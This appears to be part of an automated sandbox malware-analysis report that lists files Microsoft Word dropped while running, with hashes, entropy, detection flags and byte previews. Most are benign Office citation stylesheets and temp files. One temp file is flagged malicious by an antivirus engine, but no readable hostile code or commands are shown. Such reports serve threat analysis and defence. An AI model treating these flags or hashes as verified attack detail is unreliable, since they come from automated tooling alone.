                        SSDEEP:12288:/3zUbLds556T1BEFGHtASk3+/KLQ/zp1km/WJ1ov0mPqxXE/RoVZPE9Ob:/Qfds5opwSL1kovT92
                        MD5:4DFB7AADD4771ADDF1BA168C12DEDBF3
                        SHA1:B379DC0E19FE0F51E77305BE0A7F3421B80E8A0F
                        SHA-256:DB9B46CC2132D76EF90CA9A59AF03CB478BB91EA2CDA3E8E42DD0801873416E2
                        SHA-512:1C5AE2C794017A81A4232A2EF43725A0DA30F9672123940D85D34A4A77744D2D7ECA5FFE9A91E2FEDDBDBADE4EEAD6AB80E565C1F8FBB813C5A2BC25F7F0A359
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:........... OS/29.P...(...`cmap.s.........pglyf..e.......0.head-@;,.......6hheaE.@B.......$hmtx...........ploca..@....h...tmaxp........... name.T+...A|....post...<..B.... ........Me.._.<...........<.............Aa.x.................Q....Aa....Aa.........................~...........................j.......................3..............................MS .@.......(...Q................. ...........d.......0...J.......8...>..........+a..#...,................K.......z...............N......*...!...-...+....z.......h..%^..3...&j..+...+%.."....................l......$A...,.......g...&...=.......X..&........*......&...(B...............#.......j...............+...P...5...@...)..........#............*...N...7......<...;>.............. ]...........5......#....s.......$.......$.......^...................H.......%...7.......6.......O...V...........K.......c......!...........$...&...*p..+<..+...-....q.......O...................F..(....5..0K..$...0V...k..*e...o...........S...*...0..0...*M......9...

                        C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shm

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):32768
                        Entropy (8bit):0.03543965254728935
                        Encrypted:false
                        SSDEEP:3:Gtl8/2omJokBtElYl8/2omJokBtE//llT89//Wlkl:GtG2JoKt/G2JoKtMJ89Xis
                        MD5:C44A4DA3AA70A5E2CB411F85BC6B9F7B
                        SHA1:191C6EA4E48461EB8FF12149E42664EBBC49E076
                        SHA-256:9AEDB55F7926314AE1BC8F39503E91B92CB7DB557B38E9C30963F9C51F95D620
                        SHA-512:0934A7B0B288F19D6D944F45D7CEC0C760877658D21F7B192D4F70F4E968E18B488D8ABE63D684D321AC18012B4C072B6448051F9F185AE4460EC424CE50B87E
                        Malicious:false
                        Preview:..-......................e.:..ATk...G....}.<d.....-......................e.:..ATk...G....}.<d...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:SQLite Write-Ahead Log, version 3007000
                        Category:dropped
                        Size (bytes):4152
                        Entropy (8bit):1.3822995166211012
                        Encrypted:false
                        SSDEEP:12:KcKxOacAqtZeY4syJttJxUSo0x9DdN1tDEX4vcImm5RyZkFv4sbf:KlxOajqt8VtbDBtDi4kZERDf
                        MD5:66ED66C9B9BC59B2C955DFAA0F06A9FE
                        SHA1:9A4073A3343B92CC2450412A924C25E89F5A77CC
                        SHA-256:ECBC7710B5187C6F40DBA570F8C5C27A668C1FA208B479951B85BB8D7875621B
                        SHA-512:60D8B54A03612FA7F6488AED0FFFB180CD608D28ACACCBC5B8018B8CEE36FCC5DB60BCFA4E034BB53F439D8937FFBEB0036415496DCED45639CFF124A2E5506E
                        Malicious:false
                        Preview:7....-..........k...G....r.~...j........k...G...:.e.TA..SQLite format 3......@ .......................................................................... ..........#.....g............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\ABA973DF.emf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):4964
                        Entropy (8bit):3.3635954598868976
                        Encrypted:false
                        SSDEEP:48:FUD3hNZtbmsdBg6qjpLkwOEG6kpnydHk7al:mTZtLBFq9gV+EM
                        MD5:511EF60E1F58994DE2F954FAECE5383F
                        SHA1:F0E2E52AD5B55758760EA475892EBF3C9085D333
                        SHA-256:5F9B76346C88E6AA464B68E994DD0F9EDD321C40B7937233C589EC8751F4FB97
                        SHA-512:22145223B60C2DDDFE8FE4F835F68B460DFAAAF85DFF4274A43389ED5BF23187FF5CD118ABE7FE4A893A381A6F82A4C00ACF38D8053326916D4FB0654A79DE36
                        Malicious:false
                        Preview:....l...........#.../...........!....... EMF....d.......................V.......i......................:...........................'...5...R...p...................................S.e.g.o.e. .U.I.....................................................\........[o.....(.?................................$.....\o......................[o..............Zo.....................a$........?............................. .?.......>......................................................\o......\o.....(]o.........dv......%...................................r...............#............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Composite Document File V2 Document, Cannot read section info
                        Category:dropped
                        Size (bytes):753664
                        Entropy (8bit):6.56720077670688
                        Encrypted:false
                        SSDEEP:12288:VC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:AKHaY8k5faaboEy6r8zz1
                        MD5:97E9A7C60BFF384A23E99F52C4F3905B
                        SHA1:30C329B3BDC84FED1F62F7C087512FE0C773322E
                        SHA-256:8C4621AC76E4C244A3D71603F8A26AD42802E7C9654734DB4672519C44F8AD52
                        SHA-512:B94F5F2C866DB0F4AF07BD9D6174919EF2089B5AB0B0021A7C3063BE6022258A5651C3718EB241769CB8A5EA0FD1B8118F493262A3A6DA0557CF1559B48BC12C
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:......................>.........................................................../...0...1...2...3...4...5...6...7...8...................................................................................................................................................................................................................................................................................................................................................................................................................................................................!........................................................... ..........."...-...$...%...&...'...(...)...*...+...,.......................................................:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{0F394667-A1CD-4F23-A2AE-B90D8624C9C1}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05194905805374581
                        Encrypted:false
                        SSDEEP:3:1lvlxlln:vz
                        MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                        SHA1:D15075354757A59DE6E057435511D956663955FB
                        SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                        SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{905C0DA3-74DE-4233-9B57-2F4E7179B01B}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05390218305374581
                        Encrypted:false
                        SSDEEP:3:ol3lYdn:4Wn
                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\TCDAC26.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):290
                        Entropy (8bit):3.5081874837369886
                        Encrypted:false
                        SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                        MD5:8D9B02CC69FA40564E6C781A9CC9E626
                        SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                        SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                        SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAC26.tmp\gostname.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):255948
                        Entropy (8bit):5.103631650117028
                        Encrypted:false
                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                        MD5:9888A214D362470A6189DEFF775BE139
                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                        C:\Users\user\AppData\Local\Temp\TCDAC56.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):278
                        Entropy (8bit):3.5280239200222887
                        Encrypted:false
                        SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                        MD5:877A8A960B2140E3A0A2752550959DB9
                        SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                        SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                        SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAC56.tmp\gb.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):268317
                        Entropy (8bit):5.05419861997223
                        Encrypted:false
                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                        MD5:51D32EE5BC7AB811041F799652D26E04
                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                        C:\Users\user\AppData\Local\Temp\TCDAC8A.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):286
                        Entropy (8bit):3.538396048757031
                        Encrypted:false
                        SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                        MD5:149948E41627BE5DC454558E12AF2DA4
                        SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                        SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                        SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAC8A.tmp\sist02.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):250983
                        Entropy (8bit):5.057714239438731
                        Encrypted:false
                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                        MD5:F883B260A8D67082EA895C14BF56DD56
                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                        C:\Users\user\AppData\Local\Temp\TCDAC8B.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):290
                        Entropy (8bit):3.5161159456784024
                        Encrypted:false
                        SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                        MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                        SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                        SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                        SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAC8B.tmp\turabian.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):344303
                        Entropy (8bit):5.023195898304535
                        Encrypted:false
                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                        C:\Users\user\AppData\Local\Temp\TCDACBC.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):374
                        Entropy (8bit):3.5414485333689694
                        Encrypted:false
                        SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                        MD5:2F7A8FE4E5046175500AFFA228F99576
                        SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                        SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                        SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDACBC.tmp\Text Sidebar (Annual Report Red and Black design).docx

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):47296
                        Entropy (8bit):6.42327948041841
                        Encrypted:false
                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                        Malicious:false
                        Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                        C:\Users\user\AppData\Local\Temp\TCDAD5F.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):332
                        Entropy (8bit):3.4871192480632223
                        Encrypted:false
                        SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                        MD5:333BA58FCE326DEA1E4A9DE67475AA95
                        SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                        SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                        SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAD5F.tmp\mlaseventheditionofficeonline.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):254875
                        Entropy (8bit):5.003842588822783
                        Encrypted:false
                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                        MD5:377B3E355414466F3E3861BCE1844976
                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                        C:\Users\user\AppData\Local\Temp\TCDAD60.tmp\Content.inf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):288
                        Entropy (8bit):3.523917709458511
                        Encrypted:false
                        SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                        MD5:4A9A2E8DB82C90608C96008A5B6160EF
                        SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                        SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                        SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                        C:\Users\user\AppData\Local\Temp\TCDAD60.tmp\chicago.xsl

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):296658
                        Entropy (8bit):5.000002997029767
                        Encrypted:false
